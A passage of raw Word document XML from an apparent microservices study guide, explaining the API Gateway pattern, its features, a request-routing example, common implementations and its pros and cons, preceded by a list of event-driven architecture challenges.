    <w:p w14:paraId="1103184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calable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7C93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t to service failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11801AC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asy to extend (plug new consumers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8F1FAC"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9A27455">
          <v:rect id="_x0000_i3111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF073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hallenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E849B0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ventual consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C316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bugging &amp; tracing across async boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204069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essage duplication or ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DE4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Schema evolution/versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351EA39E" w14:textId="4F746DC0"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3112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392509C" w14:textId="17B5A619" w:rsidR="007635D1" w:rsidRPr="00CE4B95" w:rsidRDefault="007635D1" w:rsidP="007635D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="733" w:name="_Toc197867947"/>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="733"/>
    </w:p>
    <w:p w14:paraId="6DCEED5A" w14:textId="403E59A5" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway is a server-side application that sits between clients (e.g., web apps, mobile apps) and backend microservices. It serves as a reverse proxy to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D35E1"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ccept client requests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC8E5B3"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Route them to the appropriate microservice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD40C88" w14:textId="77777777" w:rsid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ggregate the responses (if needed),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF0D7D" w14:textId="52135C98" w:rsidR="007635D1" w:rsidRPr="00B03D52" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03D52">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apply policies like authentication, rate limiting, and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02455C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centralizes cross-cutting concerns for microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FCC639"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79DD8D01">
          <v:rect id="_x0000_i3113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D3E3E"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Why Use an API Gateway?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59B09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out an API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169BFC65"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must know the URLs and ports of each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E955BE4"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Every microservice must implement security, logging, CORS, rate limiting, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E181E" w14:textId="0CCCF9BC"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There’s a risk of tight coupling between clients and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA00D24"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With an API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB06DA"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lients only interact with one endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD36C12" w14:textId="77777777" w:rsid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Cross-cutting concerns are handled centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D92D8F" w14:textId="2D7CE113" w:rsidR="007635D1" w:rsidRPr="00FF618A" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF618A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Microservices remain clean, focused, and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B5A24A"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437758AC">
          <v:rect id="_x0000_i3114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FB477"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How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B334B"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Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB739A"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Client → API Gateway → Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EACFD"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF6DA5"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A client wants order data. It sends a request to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E1B40" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="0059270A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET /orders/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EACA79"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I Gateway authenticates the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0937E" w14:textId="553F92AD"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outes it to the Order Service at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB70C0F" w14:textId="43C2B483" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="0059270A" w:rsidP="0059270A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="007635D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://orders-service/api/v1/orders/123</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="309AE90B" w14:textId="77777777" w:rsid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Applies rate limiting and caching rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885220E" w14:textId="0F50FA31" w:rsidR="007635D1" w:rsidRPr="0059270A" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059270A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Returns the response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667843A2"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54919B52">
          <v:rect id="_x0000_i3115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC781C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Features of an API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBA18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1. Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D000B1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Forwards requests to the correct backend service based on the URL path, headers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B6256E"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xample: /users/** goes to User Service, /orders/** goes to Order Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C6D003"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2. Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127083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Distributes traffic among multiple service instances (via Ribbon, Netflix Eureka, Kubernetes, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173DD74"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3. Authentication &amp; Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503AE6B"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Validates JWT tokens, OAuth tokens, API keys before forwarding requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946FB5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duplication of security logic in microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325027C"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4. Rate Limiting &amp; Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD2CC9"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Prevents abuse and controls traffic by limiting the number of requests per IP or user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BD76A"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5. Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653C06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Reduces load by caching frequent responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609AA95"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6. Request/Response Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1C436"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Modifies payloads, headers, or protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F311A4A"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E.g., converts XML to JSON, rewrites URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA7E71"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7. Logging &amp; Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6861B50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Tracks API metrics (response time, errors, traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076AB0AD"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Integrates with tools like ELK stack, Prometheus, Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23089C3D"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8. CORS Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E9D4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Centralized management of Cross-Origin Resource Sharing headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C3E9A8" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="00293268">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Service Aggregation (Composite Response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7B577"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lastRenderedPageBreak/>
        <w:t>Combines results from multiple microservices into a single response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46294B34" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="00293268">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Useful for mobile clients needing fewer round-trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936F3D7"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710074A6">
          <v:rect id="_x0000_i3116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3552CE"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Architecture Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B6583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Client (Web, Mobile, IoT) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126221DA" w14:textId="4B7CA29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5E7B6F">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59B957C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36692DE2" w14:textId="2BDDFC3B"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API Gateway  </w:t>
      </w:r>
      <w:r w:rsidR="0018559C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C12009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p>
    <w:p w14:paraId="59AE1B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75E9AF0"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536A8C1A" w14:textId="5C36934C"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Auth │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User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 │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Order│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398DB403" w14:textId="6A46825A"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 xml:space="preserve">Svc   </w:t>
      </w:r>
      <w:r w:rsidR="00F52086">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FA6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 xml:space="preserve"> └──────┘ └──────┘ └──────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3DE1D"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987F8AB">
          <v:rect id="_x0000_i3117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CCAEF0" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common Implemen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568"/>
        <w:gridCol w:w="3402"/>
      </w:tblGrid>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="4543A34A" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07601412"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Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BEE9E2E"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C37018F"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Highlights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="4D8A4A3B" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDC2DA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pring Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FCFCBA9"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Reactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11C4FF7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Reactive, part of Spring ecosystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="6997E381" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4EA1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etflix Zuul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA53CE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Java (blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A1D858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egacy, pre-Spring Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="76C5AB27" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FFC1CE"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Kong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28BAAB91"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Lua/Nginx based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C54A83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Plugin-based, performant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="002A4F84" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1843F65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GINX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="024D8B1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Native Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DCFEDD"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onfigurable reverse proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="0E3F29DA" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72391C4B"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WS API Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13FF62EF"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47832C16"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Scalable, tightly integrated with AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007635D1" w:rsidRPr="007635D1" w14:paraId="0AD5A514" w14:textId="77777777" w:rsidTr="00B16631">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28354C37"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pigee, Azure API Mgmt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB9A06A"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Cloud-native</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F4BD275"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Enterprise-grade solutions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="412AAA2F"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05B9568">
          <v:rect id="_x0000_i3118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFB693"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Advantages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CF0DE"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entry point simplifies clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16D939"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entralized logging, monitoring, and security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713CAF2B"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Easier version management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D938DDB" w14:textId="7EB141F7"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Offloads complexity from microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B5F316"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447F9617">
          <v:rect id="_x0000_i3119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B5561"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Disadvantages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279B04C"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Single point of failure (unless made highly available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E47F5"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Adds latency due to the extra hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C76AAB2" w14:textId="77777777" w:rsid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Complex configuration for large systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132FE95F" w14:textId="743E1348" w:rsidR="007635D1" w:rsidRPr="00B16631" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16631">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Might require horizontal scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30188DCC"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6DADCBFE">
          <v:rect id="_x0000_i3120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39048BFF" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
